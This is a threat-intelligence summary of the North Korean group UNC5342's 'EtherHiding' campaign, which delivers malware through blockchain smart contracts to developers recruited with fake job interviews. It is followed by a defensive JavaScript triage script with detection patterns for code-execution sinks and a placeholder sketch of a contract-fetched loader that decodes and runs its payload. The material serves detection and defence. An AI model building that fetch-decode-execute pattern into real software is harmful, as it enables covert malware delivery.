Full Report
North Korean hackers were observed employing the 'EtherHiding' tactic to deliver malware, steal cryptocurrency, and perform espionage with stealth and resilience. [...]
Analysis Summary
# Threat Actor: UNC5342
## Attribution & Identity
Nation-state threat actor attributed to North Korea (DPRK). Tracked internally by Google Threat Intelligence Group (GTIG) as **UNC5342**.
## Activity Summary
UNC5342 actors have been employing the "EtherHiding" technique since February in the campaign codenamed **Contagious Interview**. The technique uses smart contracts on public blockchains (Ethereum or BNB Smart Chain) to host and deliver malware payloads during social engineering operations, which primarily target software and web developers with fake job interview offers.
## Tactics, Techniques & Procedures
- **Malware Distribution via Blockchain:** Utilizing the **EtherHiding** technique where malicious scripts are embedded within smart contracts on the Ethereum or BNB Smart Chain.
- **Social Engineering:** Initiating attacks through fake job interviews using fabricated entities such as BlockNovas LLC, Angeloper Agency, and SoftGlide LLC.
- **Execution Flow:** Victims are tricked into running provided code during a technical assessment, which executes a JavaScript downloader.
- **Payload Delivery:** The smart contract hosts the **JADESNOW** downloader, which interacts with Ethereum to fetch the third-stage payload.
- **In-Memory Execution:** The final payload runs in memory, which hinders traditional static analysis.
- **Stealth:** Payloads are retrieved with read-only contract calls, which submit no transaction and therefore leave no on-chain transaction history for the retrieval.
- **Persistent Command and Control (C2):** The malware polls its C2 for instructions to run arbitrary commands or exfiltrate files.
- **Data Exfiltration:** Files are prepared and exfiltrated, often in ZIP form, to an external server or Telegram.
- **Payload Flexibility:** The use of multiple blockchains (Ethereum and BNB Smart Chain) suggests operational compartmentalization and flexibility in retrieving payloads. Contract updates are cheap and frequent (up to 20 updates in four months were observed), so the operators can change configuration with little effort.
## Targeting
- **Sectors:** Software and web development industries.
- **Geography:** Not explicitly stated, but typical of DPRK operations targeting global entities.
- **Victims:** Software and web developers solicited via fake job offers.
## Tools & Infrastructure
- **Malware Families Used:**
  - **JADESNOW:** A JavaScript downloader used as the initial stage to fetch further components.
  - **InvisibleFerret (JavaScript version):** The primary third-stage payload used for long-term espionage functions.
  - **Credential Stealer Component:** A secondary malware component designed to steal sensitive information.
- **Infrastructure:**
  - **Malware Hosting:** Public blockchains (Ethereum and BNB Smart Chain) used via smart contracts.
  - **Exfiltration Channel:** Telegram and external servers.
  - **Fabricated Entities:** BlockNovas LLC, Angeloper Agency, SoftGlide LLC.
## Implications
The adoption of EtherHiding by a state-sponsored actor like UNC5342 marks a significant development in malware distribution complexity. The technique provides high anonymity, resilience against takedown procedures, and cost-effective payload manipulation, making tracking and disruption of these campaigns much harder for defenders. The targeting of developers through supply-chain-like social engineering vectors also poses broader risks.
## Mitigations
- Individuals should exercise extreme caution when asked to download or execute files during job application or interview processes.
- Test all received files, especially scripts, in isolated environments before execution.
- Administrators should enforce download restrictions for risky file types (.EXE, .MSI, .BAT, .DLL) on Chrome Enterprise.
- Assume full control over browser updates to prevent tampering.
- Implement strict web access and script execution policies (e.g., CSP hardening).
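The following is an added example, not code from the report or from GTIG, that serves both the execution-flow description above (a JavaScript downloader fetching later stages through read-only contract calls) and the mitigation of testing received scripts before execution: a static triage pass a candidate or a security team can run over a "technical assessment" file before it is executed. It flags source that pairs a read-only chain read with a code-execution sink, the combination an EtherHiding-style downloader needs. The pattern ids, the 500-character line threshold and the three sample scripts are all constructed for this example.

```javascript
'use strict';
// Added example, not code from the report or from GTIG: a pre-execution triage pass
// over a script received as a "technical assessment". It looks for the pairing an
// EtherHiding-style downloader needs: a read-only blockchain read (eth_call or a
// storage read, which creates no transaction) whose result reaches a code-execution
// sink. Pattern names, thresholds and samples are this example's own assumptions.

// Read-only chain access. Legitimate web3 code uses these too, so on their own they
// are informational, not a verdict.
const RPC_PATTERNS = [
  { id: 'rpc.eth_call', re: /\beth_call\b/ },
  { id: 'rpc.eth_getStorageAt', re: /\beth_getStorageAt\b/ },
  { id: 'rpc.provider_call', re: /\b(?:provider|contract)\.call\s*\(/ },
];

// Places where a string becomes executable code.
const SINK_PATTERNS = [
  { id: 'sink.eval', re: /\beval\s*\(/ },
  { id: 'sink.new_function', re: /\bnew\s+Function\s*\(/ },
  { id: 'sink.vm_run', re: /\bvm\.runIn(?:New|This)Context\s*\(/ },
  { id: 'sink.child_process', re: /\brequire\s*\(\s*['"]child_process['"]\s*\)/ },
];

// Decoding steps that typically sit between the chain read and the sink.
const DECODE_PATTERNS = [
  { id: 'decode.hex_buffer', re: /Buffer\.from\s*\([\s\S]*?['"]hex['"]\s*\)/ },
  { id: 'decode.atob', re: /\batob\s*\(/ },
  { id: 'decode.utf8_from_hex', re: /\b(?:toUtf8String|hexToUtf8|hexToAscii)\s*\(/ },
];

function matchIds(source, patterns) {
  return patterns.filter((p) => p.re.test(source)).map((p) => p.id);
}

// Returns { verdict, findings }. 'suspicious' = chain read and code sink in the same
// script; 'review' = a code sink without a chain read; 'clean' = no code sink.
function triageScript(source) {
  const rpc = matchIds(source, RPC_PATTERNS);
  const sinks = matchIds(source, SINK_PATTERNS);
  const decode = matchIds(source, DECODE_PATTERNS);
  const findings = [...rpc, ...sinks, ...decode];

  // Very long lines are a cheap minification/obfuscation signal; recorded, not scored.
  const longestLine = source.split('\n').reduce((m, l) => Math.max(m, l.length), 0);
  if (longestLine > 500) findings.push('obfuscation.long_line');

  let verdict = 'clean';
  if (rpc.length > 0 && sinks.length > 0) verdict = 'suspicious';
  else if (sinks.length > 0) verdict = 'review';
  return { verdict, findings };
}

// Constructed samples standing in for files a candidate might receive.
const SAMPLES = {
  // Ordinary assignment code: reads chain state, never executes what it reads.
  benign: [
    'const provider = new ethers.JsonRpcProvider(process.env.RPC_URL);',
    'const balance = await provider.getBalance(walletAddress);',
    'console.log(ethers.formatEther(balance));',
  ].join('\n'),
  // Sketch of the reported pattern: a read-only call whose hex result is decoded and
  // handed to a code sink. Placeholder identifiers only; not a working loader.
  staged: [
    "const raw = await rpc('eth_call', [{ to: CONTRACT_ADDR, data: SELECTOR }, 'latest']);",
    "const stage = Buffer.from(raw.slice(2), 'hex').toString('utf8');",
    'new Function(stage)();',
  ].join('\n'),
  // Dynamic code with no chain access: worth a look, but not the EtherHiding pairing.
  dynamicOnly: 'const cfg = eval(atob(process.env.CFG_B64));',
};

// Triage every sample and return the results keyed by sample name.
function triageAll(samples = SAMPLES) {
  const out = {};
  for (const [name, src] of Object.entries(samples)) out[name] = triageScript(src);
  return out;
}

for (const [name, r] of Object.entries(triageAll())) {
  console.log(`${name.padEnd(12)} ${r.verdict.padEnd(11)} ${r.findings.join(', ') || '-'}`);
}
```

The heuristic is a first filter, not a replacement for detonation: a loader can split `eval` across string concatenation or load its sink through a dependency, so anything that arrives with a job offer still belongs in an isolated environment before it runs, as the mitigations above recommend. The `findings` list is kept alongside the verdict so an analyst can see which read, sink and decode step triggered it rather than only a label.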